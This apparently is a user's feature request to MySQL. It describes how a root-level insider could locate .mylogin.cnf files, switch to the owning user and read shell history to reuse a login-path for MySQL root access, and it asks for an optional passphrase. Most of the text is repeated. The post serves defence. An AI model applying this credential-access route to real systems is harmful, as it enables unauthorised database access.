I know this is a ridiculous suggestion, but I see a minor hole in the usage of the Passwordless Authentication protection method for MySQL 5.6+.
Only because my customer is who they are, they may suggest that the passwordless authentication is not bullet proof, if bash (or shell) history is enabled.
If an insider-threat becomes root user on Linux (I know, you have a BIG-ASS problem, but hear me out), then does a find for a file named .mylogin.cnf under /home then that person can now simply become that user using "su - username", search the user's bash history command to find out the that "NAME" of the login-path is, and BAM, he's in as MySQL root user.
Question: Can a future version of the passwordless authentication tool have an additional argument added to force the usage to also include a password or passphase when gaining access to the .mylogin.cnf file?
This would be much like a fully encrypted gpg file where you must type the password in an interactive interface where the user's shell history would not capture that information.
Thanks, I know it seem like overkill. For now we'll use gpg to protect any clear-text files that may contain connector information.
Only because my customer is who they are, they may suggest that the passwordless authentication is not bullet proof, if bash (or shell) history is enabled.
If an insider-threat becomes root user on Linux (I know, you have a BIG-ASS problem, but hear me out), then does a find for a file named .mylogin.cnf under /home then that person can now simply become that user using "su - username", search the user's bash history command to find out the that "NAME" of the login-path is, and BAM, he's in as MySQL root user.
Question: Can a future version of the passwordless authentication tool have an additional argument added to force the usage to also include a password or passphase when gaining access to the .mylogin.cnf file?
This would be much like a fully encrypted gpg file where you must type the password in an interactive interface where the user's shell history would not capture that information.
Thanks, I know it seem like overkill. For now we'll use gpg to protect any clear-text files that may contain connector information.